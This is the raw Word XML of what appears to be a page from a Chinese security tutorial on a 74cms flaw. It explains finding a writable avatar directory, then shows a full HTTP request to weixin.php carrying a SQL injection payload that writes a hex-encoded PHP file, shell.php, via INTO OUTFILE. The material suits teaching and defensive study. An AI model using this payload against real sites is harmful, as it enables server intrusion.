    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37" w:line="290" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="786"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这是因为写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shell.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要有写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不行。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但是，但是，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也可以找一个肯定有写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限的目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册一个普通用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>长传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>像，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是会建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-82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0777 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限的目录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">'data/avatar/100/2014',shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="290" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN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spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1026" type="#_x0000_t202" style="width:337.5pt;height:327.95pt;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001" fillcolor="#f8f8f8" strokecolor="#ccc" strokeweight=".24pt">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent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1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POST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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">/74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d325 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>5bfef95601890afd80709 HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="3070"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Content-Type: application/xml User-Agent: http4e/5.0.12 Host: **</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.*</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*.**.**:8081 Content-Length: 340</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="28"/>
                    </w:rPr>
                  </w:pP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&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>xml</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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&lt;ToUserName&gt;111&lt;/ToUserName&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;FromUserName&gt;1111&amp;apos; union select 0x3C3F70687020706870696E666F28293B3F3E</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,2,3,4,5,6,7,8</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>9,10,11,12,13,14,15,16,17,18,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>19,20,21,22 INTO OUTFILE</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&amp;apos</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>;/</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">var/www/html/74cms/data/avatar/100/2014/shell. </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>php&amp;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>apos; #&lt;/FromUserName&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;Content&gt;2222&lt;/Content&gt;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&lt;Event&gt;CLICK&lt;/Event&gt;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&lt;EventKey&gt;binding&lt;/EventKey&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;/xml&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"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9664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1141475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>221492</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3876936" cy="2563177"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="12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936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F3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sect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rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="311" w:lineRule="exact"/>
        <w:ind w:left="3098" w:right="3096"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:sectPr w:rsidR="00292EF3">
      <w:pgSz w:w="9980" w:h="14190"/>
      <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="9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20F" w:rsidRDefault="0080020F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0080020F" w:rsidRDefault="00800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238.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369952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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369736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109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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369712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119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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369688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129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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369664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139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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369640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149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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369616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159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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369592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169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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369568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179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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369544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189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36.5pt;margin-top:649.15pt;width:26pt;height:11pt;z-index:-369520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193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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369928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28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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369904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39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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369880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49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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369856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59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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369832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69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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369808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79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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369784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89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EF3" w:rsidRDefault="0080020F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38.75pt;margin-top:649.15pt;width:21.45pt;height:11pt;z-index:-369760;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                <w:pPr>
                  <w:spacing w:line="204" w:lineRule="exact"/>
                  <w:ind w:left="20" w:right="-1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sz w:val="18"/>
                  </w:rPr>
                  <w:t xml:space="preserve">- </w:t>
                </w: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623EEB">
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:noProof/>
                    <w:sz w:val="18"/>
                  </w:rPr>
                  <w:t>99</w:t>
                </w:r>
                <w:r>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="18"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> -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20F" w:rsidRDefault="0080020F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0080020F" w:rsidRDefault="00800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C6AC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A99AF5F8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="417" w:hanging="35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58"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="99"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1779" w:hanging="3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9" w:hanging="3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39" w:hanging="3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9" w:hanging="3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99" w:hanging="3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79" w:hanging="3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59" w:hanging="358"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="474E45E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C543D86"/>
    <w:lvl w:ilvl="0" w:tplc="C4B02298">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="319" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda" w:hAnsi="Vrinda" w:cs="Vrinda" w:hint="default"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7ADCA8CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="926" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DB2CAB76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1533" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="52DAFA2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2139" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="36BC361E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2746" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="69043B6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3352" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FDAA19B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AA121AE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4565" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="41E8B558">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5172" w:hanging="231"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="53CB6D44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC0825BE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="417" w:hanging="35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7" w:hanging="358"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="99"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1779" w:hanging="3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59" w:hanging="3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39" w:hanging="3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19" w:hanging="3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99" w:hanging="3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79" w:hanging="3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59" w:hanging="358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104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292EF3"/>
    <w:rsid w:val="00292EF3"/>
    <w:rsid w:val="00623EEB"/>
    <w:rsid w:val="0080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1"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1,3,4,5,6,7,8,9,10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Lucida Console" w:eastAsia="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="417" w:right="317"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="417" w:right="317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837" w:right="317"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="114" w:line="344" w:lineRule="exact"/>
      <w:ind w:right="317"/>
      <w:jc w:val="right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uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="417" w:right="317"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="exact"/>
      <w:ind w:left="417" w:right="317"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑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line="360" w:lineRule="exact"/>
      <w:ind w:left="417"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
